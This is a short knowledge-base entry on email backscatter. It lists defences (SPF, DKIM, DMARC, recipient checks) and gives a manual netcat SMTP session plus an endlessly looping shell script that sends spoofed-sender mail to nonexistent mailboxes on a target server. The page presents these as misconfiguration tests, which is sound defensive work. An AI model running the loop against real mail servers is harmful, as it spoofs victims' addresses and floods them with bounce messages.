Backscatter :: Knowledge Base (KB)

Backscatter

Backscatter is the incorrectly automated bounce messages sent by mail servers, typically as a side effect of incoming spam.can be used.

Solution

- Implement anti-forgery checks - SPF, DKIM and DMARC
- Implement recepient checks for acceptance of e-mail
- If above not possible disable NDR reports

Examples

Single test

nc 10.10.10.10 25
EHLO example.com
MAIL FROM:victim@example.com
RCPT TO:notexistingmailbox@target.com
DATA
backscatter testdata
.

Automated test

Create a file with this content (backscatter.txt)

EHLO example.com
MAIL FROM:victim@example.com
RCPT TO:notexistingmailbox@target.com
DATA
backscatter testdata
.

#!/bin/sh
while true;
do
    cat backscatter.txt | while read L; do sleep "1"; echo "$L"; done | "nc" -w 3 -C -v "<target-ip>" "25";
done

URL List

Wikipedia.org - Backscatter